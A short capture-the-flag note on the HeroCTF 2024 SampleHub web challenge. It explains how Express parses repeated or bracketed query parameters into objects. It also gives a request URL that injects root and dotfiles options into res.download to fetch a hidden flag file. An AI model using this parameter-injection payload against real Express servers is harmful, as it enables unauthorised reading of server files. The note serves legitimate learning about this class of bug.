Express req.query Notes

Notes from HeroCTF 2024 SampleHub [WEB].

Given this code snippet:

process.chdir(path.join(__dirname, "samples"));
app.get("/download/:file", (req, res) => {
    const file = path.basename(req.params.file);
    console.log(typeof req.query.filename);
    res.download(file, req.query.filename || "sample.png", (err) => {
        if (err) {
            res.status(404).send(`File "${file}" not found`);
        }
    });
});

req.query.filename (typeof) is string is request is something like:

http://localhost:3000/download/whatever?filename=first

But req.query.filename (typeof) is object is request is something like:

http://localhost:3000/download/whatever?filename=first&filename=second

We can also inject object properties like this:

http://localhost:3000/download/.flag.txt?filename[root]=/&filename[dotfiles]=allow

req.query.filename type will also be object with something like:

filename[whatever]